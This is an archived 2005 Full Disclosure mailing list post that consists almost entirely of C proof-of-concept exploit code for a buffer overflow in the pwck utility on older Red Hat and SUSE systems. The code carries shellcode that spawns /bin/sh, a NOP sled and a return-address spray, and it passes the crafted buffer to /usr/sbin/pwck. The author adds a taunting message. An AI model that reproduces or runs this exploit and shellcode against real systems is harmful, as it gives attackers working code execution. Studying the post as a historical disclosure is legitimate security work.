Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)
From: Day Jay <d4yj4y () yahoo com>
Date: Fri, 6 May 2005 18:03:26 -0700 (PDT)

----snip----
//Chung's Donut Shop release !!
//Redhat/Suse PWCK Buffer overflow POC Code 
//(PWCK is NOT SETUID) This isn't fake 
//code I promise (it may be borrowed) ;)  d4yj4y 
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
unsigned long sp(void)         
{ __asm__("movl %esp, %eax");} 
int main(int argc, char *argv[])
{
  int i, offset;
  long esp, ret, *addr_ptr;
  char *buffer, *ptr;
  offset = 1700; //the offset I first found worked
  esp = sp();                
  ret = esp - offset;         
  buffer = malloc(2200);
  ptr = buffer;
  addr_ptr = (long *) ptr;
  for(i=0; i < 2200; i+=4)
  { *(addr_ptr++) = ret; }
  for(i=0; i < 1000; i++)
  { buffer[i] = '\x90'; }
  ptr = buffer + 200;
  for(i=0; i < strlen(shellcode); i++)
  { *(ptr++) = shellcode[i]; }
  buffer[2200-1] = 0;
  printf("d4yj4y fscked j00r mom!\n"); sleep(2);
   execl("/usr/sbin/pwck", "pwck", buffer, 0);
  free(buffer);
  return 0;
}
----snip----



                
Yahoo! Mail
Stay connected, organized, and protected. Take the tour:
http://tour.mail.yahoo.com/mailtour.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]